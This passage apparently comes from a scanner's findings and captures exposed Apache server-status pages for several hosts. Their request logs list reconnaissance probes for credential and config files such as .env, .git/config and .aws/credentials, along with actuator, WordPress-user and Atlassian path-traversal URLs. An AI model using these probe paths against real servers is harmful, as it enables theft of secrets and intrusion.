/server-status HTTP/1.1 1-2320337670/7/190_ 0.192331470.00.010.50 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-2320337670/6/205_ 0.192328960.00.080.63 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2320337670/5/190_ 0.191330550.00.010.68 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-2320337670/7/201_ 0.191326070.00.010.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-2320337670/5/189_ 0.191324920.00.010.47 127.0.0.1http/1.1<
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfc12f5fed
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Sunday, 02-Feb-2025 04:04:59 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 24 Parent Server MPM Generation: 23 Server uptime: 22 days 5 hours 26 minutes 2 seconds Server load: 0.02 0.18 0.19 Total accesses: 21849 - Total Traffic: 61.2 MB - Total Duration: 343305 CPU Usage: u31.69 s55.43 cu444.64 cs168.77 - .0365% CPU load .0114 requests/sec - 33 B/second - 2938 B/request - 15.7126 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 02033768no0yes124000 12033767no0yes025000 Sum200 149000 _____W____________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2320337680/3/347_ 0.091365740.00.010.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 0-2320337680/3/354_ 0.090366820.00.011.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-2320337680/4/347_ 0.091353550.00.011.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-2320337680/3/377_ 0.090361950.00.010.93 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-2320337680/3/329_ 0.08568554020.00.010.64 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-23203376811/3/366W 0.080058420.00.010.95 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 0-2320337680/2/357_ 0.08811348680.00.001.05 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-2320337680/3/363_ 0.08811349310.00.000.86 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-2320337680/2/340_ 0.08811358960.00.011.20 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.env HTTP/1.1 0-2320337680/3/371_ 0.08811355610.00.000.99 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-2320337680/2/332_ 0.08811450380.00.010.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 0-2320337680/3/364_ 0.08811359690.00.011.05 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /config.json HTTP/1.1 0-2320337680/2/341_ 0.08810355620.00.000.71 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 0-2320337680/2/365_ 0.08810361780.00.001.03 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /info.php HTTP/1.1 0-2320337680/3/361_ 0.08810360730.00.001.02 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-2320337680/1/351_ 0.04563959260.00.000.98 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/3/345_ 0.092368070.00.010.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 0-2320337680/1/345_ 0.04805243160.00.000.95 140.248.73.64http/1.1api.hnstream.com:8000GET /comments/items/ HTTP/1.1 0-2320337680/3/361_ 0.08641050870.00.001.09 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2320337680/1/350_ 0.0459654010.00.000.74 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2320337680/3/359_ 0.093357510.00.010.85 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2320337680/3/363_ 0.093349990.00.010.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2320337680/3/338_ 0.093357330.00.010.94 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-2320337680/3/374_ 0.091350170.00.010.98 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-2320337680/3/353_ 0.092357780.00.011.22 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-2320337670/3/203_ 0.08300539440.00.000.64 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/3/192_ 0.12435243390.00.060.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-2320337670/6/191_ 0.123230700.00.070.67 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-2320337670/3/190_ 0.123427780.00.010.53 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2320337670/6/208_ 0.122339610.00.010.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server HTTP/1.1 1-2320337670/3/204_ 0.122332980.00.010.66 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2320337670/5/211_ 0.122338140.00.010.85 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /about HTTP/1.1 1-2320337670/4/188_ 0.121330970.00.020.58 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2320337670/5/190_ 0.121328570.00.010.41 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2320337670/5/189_ 0.121338340.00.010.79 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2320337670/4/194_ 0.120139130.00.010.80 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2320337670/4/188_ 0.120334370.00.010.63 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 1-2320337670/5/200_ 0.120322540.00.010.51 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 1-2320337670/4/190_ 0.120323080.00.010.71 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 1-2320337670/5/208_ 0.11809434240.00.010.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-2320337670/3/182_ 0.11809433170.00.010.55 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /s/130323e2339313e27323e24333/_/;/META-INF/maven/com.atlass 1-2320337670/3/210_ 0.11808629780.00.010.62 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /config.json HTTP/1.1 1-2320337670/4/197_ 0.11808434820.00.010.86 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /telescope/requests HTTP/1.1 1-2320337670/3/202_ 0.12808633120.00.000.74 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /info.php HTTP/1.1 1-2320337670/4/187_ 0.12808731320.00.000.49 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 1-2320337670/2/201_ 0.09803628800.00.000.56 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2320337670/3/188_ 0.07536030430.00.010.68 148.113.208.45http/1.1 1-2320337670/3/197_ 0.12370025860.00.000.79 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2320337670/3/187_ 0.08365124840.00.000.47 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-23
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabf1d000384
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Thursday, 30-Jan-2025 23:47:20 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 21 Parent Server MPM Generation: 20 Server uptime: 20 days 1 hour 8 minutes 23 seconds Server load: 0.20 0.22 0.19 Total accesses: 19594 - Total Traffic: 55.9 MB - Total Duration: 264250 CPU Usage: u29.19 s50.47 cu375.05 cs143.5 - .0345% CPU load .0113 requests/sec - 33 B/second - 2993 B/request - 13.4863 ms/request 1 requests currently being processed, 74 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01755020no0yes025000 11784894no0yes124000 21755021no0yes025000 Sum300 174000 _______________________________________W________________________ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-2017550200/21/317_ 0.552347055230.00.040.66 127.0.0.1http/1.1hnstream.com:8000GET /info.php HTTP/1.1 0-2017550200/16/323_ 0.572350146020.00.031.14 104.156.83.163http/1.1api.hnstream.com:8000POST / HTTP/1.1 0-2017550200/18/317_ 0.573365638850.00.040.97 104.156.83.31http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2017550200/18/348_ 0.572957444530.00.110.87 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 0-2017550200/21/304_ 0.601555642990.00.110.60 157.52.96.75http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2017550200/17/336_ 0.574574146950.00.040.89 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2017550200/18/333_ 0.561158136930.00.031.00 127.0.0.1http/1.1api.hnstream.com:8000GET / HTTP/1.1 0-2017550200/15/334_ 0.561550637360.00.030.81 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/19/317_ 0.594460649380.00.031.15 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/19/344_ 0.602355245060.00.110.94 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 0-2017550200/19/305_ 0.602764738810.00.040.89 157.52.96.75http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2017550200/20/337_ 0.602324548380.00.041.00 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/18/315_ 0.572759643020.00.030.65 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/17/338_ 0.60557745270.00.060.99 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/23/330_ 0.584579648430.00.040.98 157.52.96.75http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2017550200/18/328_ 0.56552647770.00.040.94 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/17/318_ 0.593605756390.00.030.79 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/17/316_ 0.585062731980.00.020.83 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/16/335_ 0.573600438370.00.021.04 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-2017550200/19/325_ 0.602962741960.00.040.68 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/19/332_ 0.593370744290.00.030.79 104.156.83.31http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 0-2017550200/16/334_ 0.5744551238310.00.030.81 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 0-2017550200/16/312_ 0.562319045680.00.040.89 127.0.0.1http/1.1hnstream.com:8000GET /?rest_route=/wp/v2/users/ HTTP/1.1 0-2017550200/20/342_ 0.601163738950.00.030.91 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 0-2017550200/18/327_ 0.5750573246580.00.111.16 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/11/178_ 0.483062922300.00.020.59 172.206.140.62http/1.1api.hnstream.com:8000GET / HTTP/1.1 1-2017848940/10/170_ 0.502331610.00.020.41 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /actuator/env HTTP/1.1 1-2017848940/14/160_ 0.501321640.00.030.54 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 1-2017848940/13/164_ 0.50345720910.00.100.48 104.156.83.31http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2017848940/15/178_ 0.462355621490.00.130.63 157.52.96.75http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-2017848940/13/176_ 0.5033026560.00.020.59 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/15/182_ 0.463854025900.00.060.79 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /static/chat/normalize.min.css HTTP/1.1 1-2017848940/12/164_ 0.500323670.00.020.53 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 1-2017848940/13/160_ 0.502422830.00.020.34 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/14/166_ 0.501331380.00.030.74 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 1-2017848940/15/164_ 0.500322210.00.040.73 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-2017848940/12/162_ 0.501324110.00.030.58 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /version HTTP/1.1 1-2017848940/16/172_ 0.502315940.00.030.46 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server HTTP/1.1 1-2017848940/10/163_ 0.42340615260.00.020.65 104.156.83.31http/1.1api.livecounter.org:8000GET /counters/1/ HTTP/1.1 1-20178489411/14/178W 0.450027690.00.110.57 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /server-status HTTP/1.1 1-2017848940/13/159_ 0.462334422870.00.030.49 127.0.0.1http/1.1api.hnstream.com:8000GET /.env HTTP/1.1 1-2017848940/15/183_ 0.500320090.00.030.56 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /debug/default/view?panel=config HTTP/1.1 1-2017848940/12/171_ 0.483859726430.00.120.72 140.248.84.70http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2017848940/15/178_ 0.482363528940.00.110.69 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/12/159_ 0.47627023400.00.020.43 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-2017848940/11/174_ 0.442358719820.00.020.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/11/163_ 0.49632623380.00.020.62 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-2017848940/9/166_ 0.482339218710.00.160.73 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET / HTTP/1.1 1-2017848940/11/161_ 0.443057918090.00.020.43 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 1-2017848
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabff6a0f2ec
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Wednesday, 29-Jan-2025 20:10:34 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 18 days 21 hours 31 minutes 37 seconds Server load: 0.13 0.23 0.22 Total accesses: 18094 - Total Traffic: 51.0 MB - Total Duration: 197853 CPU Usage: u27.25 s47.13 cu350.3 cs135.05 - .0343% CPU load .0111 requests/sec - 32 B/second - 2956 B/request - 10.9347 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01654066no2yes025020 21654067no2yes124020 Sum204 149040 _________________________.........................______________ W__________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1916540660/15/291_ 0.600247210.00.060.61 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/16/302_ 0.610237820.00.021.10 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /about HTTP/1.1 0-1916540660/17/295_ 0.610337630.00.040.92 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1916540660/15/324_ 0.580336330.00.040.74 127.0.0.1http/1.1 0-1916540660/15/277_ 0.610534240.00.030.48 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-1916540660/14/313_ 0.600542780.00.020.84 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /actuator/env HTTP/1.1 0-1916540660/15/309_ 0.600228630.00.030.96 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/16/315_ 0.610229640.00.030.77 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /about HTTP/1.1 0-1916540660/17/293_ 0.610441810.00.041.04 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1916540660/16/319_ 0.590337120.00.040.74 127.0.0.1http/1.1 0-1916540660/14/281_ 0.610421610.00.030.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1916540660/17/310_ 0.600639320.00.130.80 127.0.0.1http/1.1editor.fanoutapp.com:8000GET / HTTP/1.1 0-1916540660/17/292_ 0.600435120.00.040.60 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/16/315_ 0.600737060.00.040.92 127.0.0.1http/1.1todo-api.fanoutapp.com:8000GET /about HTTP/1.1 0-1916540660/19/302_ 0.6101039320.00.040.92 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/16/303_ 0.610838660.00.060.81 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/14/296_ 0.590448350.00.030.68 127.0.0.1http/1.1 0-1916540660/14/293_ 0.580923940.00.040.79 127.0.0.1http/1.1 0-1916540660/15/312_ 0.600630680.00.041.00 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/13/301_ 0.580233650.00.100.63 127.0.0.1http/1.1 0-1916540660/14/307_ 0.600436370.00.060.75 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /v2/_catalog HTTP/1.1 0-1916540660/14/311_ 0.600230900.00.020.74 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /server HTTP/1.1 0-1916540660/16/290_ 0.610332320.00.110.84 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.vscode/sftp.json HTTP/1.1 0-1916540660/15/317_ 0.600430090.00.120.87 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1916540660/12/303_ 0.590432310.00.031.04 127.0.0.1http/1.1 1-14-0/0/167. 0.00418215614230.00.000.56 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/160. 0.00418215323700.00.000.39 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/actuator/env HTTP/1.1 1-14-0/0/146. 0.00418215313000.00.000.52 127.0.0.1http/1.1api.hnstream.com:8000GET /app/actuator/env HTTP/1.1 1-14-0/0/151. 0.00418215312110.00.000.38 127.0.0.1http/1.1api.hnstream.com:8000GET /settings/.env HTTP/1.1 1-14-0/0/163. 0.00418215612990.00.000.50 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/163. 0.00418215418570.00.000.57 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.testing HTTP/1.1 1-14-0/0/167. 0.00418215616820.00.000.73 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00418215315680.00.000.50 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/env HTTP/1.1 1-14-0/0/147. 0.00418215714760.00.000.31 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/152. 0.00418215722770.00.000.71 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/149. 0.00418215312890.00.000.69 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php.bak HTTP/1.1 1-14-0/0/150. 0.00418215416070.00.000.55 127.0.0.1http/1.1api.hnstream.com:8000GET /new/.env HTTP/1.1 1-14-0/0/156. 0.0041821508020.00.000.42 127.0.0.1http/1.1hnstream.com:8000GET / HTTP/1.1 1-14-0/0/153. 0.0041821537450.00.000.63 127.0.0.1http/1.1api.hnstream.com:8000GET /src/.env HTTP/1.1 1-14-0/0/164. 0.00418215319300.00.000.46 127.0.0.1http/1.1api.hnstream.com:8000GET /v1/.env HTTP/1.1 1-14-0/0/146. 0.00418215314590.00.000.45 127.0.0.1http/1.1api.hnstream.com:8000GET /config/settings.env HTTP/1.1 1-14-0/0/168. 0.00418215512090.00.000.53 127.0.0.1http/1.1api.hnstream.com:8000GET /app_dev.php HTTP/1.1 1-14-0/0/159. 0.00418215318370.00.000.60 127.0.0.1http/1.1api.hnstream.com:8000GET /db.php HTTP/1.1 1-14-0/0/163. 0.00418215720100.00.000.57 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/147. 0.00418215313860.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /app/env HTTP/1.1 1-14-0/0/163. 0.00418215411490.00.000.48 127.0.0.1http/1.1api.hnstream.com:8000GET /config/actuator/env HTTP/1.1 1-14-0/0/152. 0.00418215415250.00.000.60 157.52.72.68http/1.1api.livecounter.org:8000GET /counters/4/ HTTP/1.1 1-14-0/0/157. 0.00418215310690.00.000.56 127.0.0.1http/1.1api.hnstream.com:8000GET /config/env HTTP/1.1 1-14-0/0/150. 0.0041821539730.00.000.41 127.0.0.1http/1.1api.hnstream.com:8000GET /.env.old HTTP/1.1 1-14-0/0/164. 0.0041821539720.00.000.48 127.0.0.1http/1.1api.hnstream.com:8000GET /.aws/credentials HTTP/1.1 2-1916540670/22/278_ 0.77
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb312c28dabf2c28dabfe1394171
Apache Status Apache Server Status for todo-api.fanoutapp.com (via 127.0.0.1) Server Version: Apache/2.4.41 (Ubuntu) mod_wsgi/4.6.8 Python/2.7 Server MPM: event Server Built: 2024-07-17T18:58:09 Current Time: Wednesday, 29-Jan-2025 20:10:39 UTC Restart Time: Friday, 10-Jan-2025 22:38:57 UTC Parent Server Config. Generation: 20 Parent Server MPM Generation: 19 Server uptime: 18 days 21 hours 31 minutes 41 seconds Server load: 0.12 0.23 0.22 Total accesses: 18253 - Total Traffic: 51.4 MB - Total Duration: 198529 CPU Usage: u27.32 s47.17 cu350.3 cs135.05 - .0343% CPU load .0112 requests/sec - 33 B/second - 2955 B/request - 10.8765 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 01654066no2yes025020 21654067no2yes124020 Sum204 149040 _________________________........................._______W______ ___________..................................................... ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1916540660/18/294_ 0.650347330.00.070.61 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-1916540660/18/304_ 0.641337890.00.031.10 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-1916540660/20/298_ 0.660437730.00.050.93 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /s/1393e213e2130313e2135313/_/;/META-INF/maven/com.atlassia 0-1916540660/18/327_ 0.650336430.00.040.75 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-1916540660/18/280_ 0.660834400.00.040.48 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-1916540660/17/316_ 0.651342890.00.030.84 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-1916540660/18/312_ 0.641328710.00.030.96 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-1916540660/18/317_ 0.640229700.00.040.78 127.0.0.1http/1.1 0-1916540660/20/296_ 0.660441910.00.051.04 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-1916540660/19/322_ 0.660337230.00.050.75 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /s/1393e213e2130313e2135313/_/;/META-INF/maven/com.atlassia 0-1916540660/17/284_ 0.660321700.00.040.85 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-1916540660/20/313_ 0.650339420.00.140.81 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.DS_Store HTTP/1.1 0-1916540660/20/295_ 0.650235220.00.050.61 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-1916540660/19/318_ 0.641337150.00.040.92 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /login.action HTTP/1.1 0-1916540660/22/305_ 0.650239390.00.050.93 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /config.json HTTP/1.1 0-1916540660/19/306_ 0.660338770.00.070.82 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-1916540660/17/299_ 0.660448470.00.040.69 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /s/1393e2932313e2130313e2135313/_/;/META-INF/maven/com.atla 0-1916540660/17/296_ 0.641224010.00.040.80 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-1916540660/18/315_ 0.650430770.00.061.01 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.git/config HTTP/1.1 0-1916540660/16/304_ 0.650433760.00.110.64 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /s/1393e2339313e2130313e2135313/_/;/META-INF/maven/com.atla 0-1916540660/17/310_ 0.6501436580.00.060.76 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.env HTTP/1.1 0-1916540660/17/314_ 0.650231010.00.030.74 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /.env HTTP/1.1 0-1916540660/19/293_ 0.660332420.00.120.85 127.0.0.1http/1.1chat.fanoutapp.com:8000GET /s/1393e25363e2130313e2135313/_/;/META-INF/maven/com.atlass 0-1916540660/17/319_ 0.650330150.00.130.87 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /_all_dbs HTTP/1.1 0-1916540660/14/305_ 0.650332370.00.031.04 127.0.0.1http/1.1audiostream.fanoutapp.com:8000GET /.git/config HTTP/1.1 1-14-0/0/167. 0.00418219614230.00.000.56 127.0.0.1http/1.1editor.fanoutapp.com:8000GET /api/documents/tested/changes/?link=true&after=228 HTTP/1.1 1-14-0/0/160. 0.00418219323700.00.000.39 127.0.0.1http/1.1api.hnstream.com:8000GET /gateway/actuator/env HTTP/1.1 1-14-0/0/146. 